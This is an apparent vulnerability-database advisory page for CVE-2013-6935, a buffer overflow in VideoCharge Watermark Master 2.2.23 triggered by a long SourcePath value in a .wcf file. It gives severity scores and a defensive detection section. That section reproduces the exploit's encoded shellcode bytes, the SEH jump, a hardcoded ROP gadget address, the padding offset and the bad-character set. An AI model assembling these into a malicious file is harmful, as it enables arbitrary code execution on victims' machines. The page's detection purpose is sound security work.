cbcvebase.
CVE-2013-6935
published 2013-12-04

CVE-2013-6935: Buffer overflow in VideoCharge Software Watermark Master 2.2.23 allows remote attackers to execute arbitrary code via a long string in the SourcePath value in…

PriorityP354critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
32.35%
98.1th percentile
Buffer overflow in VideoCharge Software Watermark Master 2.2.23 allows remote attackers to execute arbitrary code via a long string in the SourcePath value in a .wcf file.

Affected

1 ranges
VendorProductVersion rangeFixed in
videochargewatermark_master

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://www.videocharge.com/download.php
urlwww.videocharge.com/download/WatermarkMaster_Install.exe
bytes
\xeb\x06\x90\x90
bytes
0x02700fee : popad # jmp ebp
bytes
\xbb\x80\xa3\x02\xb2\xda\xcc\xd9\x74\x24\xf4\x5e\x31\xc9\xb1\x33\x31\x5e\x12\x03\x5e\x12\x83\x6e\x5f\xe0\x47\x92\x48\x6c\xa7\x6a\x89\x0f\x21\x8f\xb8\x1d\x55\xc4\xe9\x91\x1d\x88\x01\x59\x73\x38\x91\x2f\x5c\x4f\x12\x85\xba\x7e\xa3\x2b\x03\x2c\x67\x2d\xff\x2e\xb4\x8d\x3e\xe1\xc9\xcc\x07\x1f\x21\x9c\xd0\x54\x90\x31\x54\x28\x29\x33\xba\x27\x11\x4b\xbf\xf7\xe6\xe1\xbe\x27\x56\x7d\x88\xdf\xdc\xd9\x29\xde\x31\x3a\x15\xa9\x3e\x89\xed\x28\x97\xc3\x0e\x1b\xd7\x88\x30\x94\xda\xd1\x75\x12\x05\xa4\x8d\x61\xb8\xbf\x55\x18\x66\x35\x48\xba\xed\xed\xa8\x3b\x21\x6b\x3a\x37\x8e\xff\x64\x5b\x11\xd3\x1e\x67\x9a\xd2\xf0\xee\xd8\xf0\xd4\xab\xbb\x99\x4d\x11\x6d\xa5\x8e\xfd\xd2\x03\xc4\xef\x07\x35\x87\x65\xd9\xb7\xbd\xc0\xd9\xc7\xbd\x62\xb2\xf6\x36\xed\xc5\x06\x9d\x4a\x39\x4d\xbc\xfa\xd2\x08\x54\xbf\xbe\xaa\x82\x83\xc6\x28\x27\x7b\x3d\x30\x42\x7e\x79\xf6\xbe\xf2\x12\x93\xc0\xa1\x13\xb6\xa2\x24\x80\x5a\x0b\xc3\x20\xf8\x53
  • The vulnerability is triggered by a long string in the SourcePath XML value within a .WCF file; monitor for .WCF files containing abnormally large SourcePath values (>516 bytes of padding before SEH overwrite).
  • The SEH overwrite uses a short JMP (\xeb\x06\x90\x90) followed by a ROP gadget at address 0x02700fee (popad # jmp ebp); detection of this byte sequence at the SEH chain offset (~516 bytes into SourcePath value) is a strong indicator of exploitation.
  • The exploit uses a NOP sled of 100 bytes (\x90 * 100) before the shellcode; scanning .WCF files for large NOP sleds embedded in XML attribute values can identify malicious files.
  • The Metasploit module targets this vulnerability as a fileformat exploit for Windows; monitor for WatermarkMaster processes spawning unexpected child processes (e.g., calc.exe or cmd.exe) as a post-exploitation indicator.
  • ·The exploit was tested only on Windows XP SP3; the hardcoded ROP gadget address (0x02700fee) is module-specific and may not be valid on other OS versions or patch levels.
  • ·The shellcode uses msfencode with bad-char filter excluding \x00\x0a\x0d\x3c\x22\x26; any detection based on raw shellcode bytes must account for encoder polymorphism if a different encoder or key is used.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.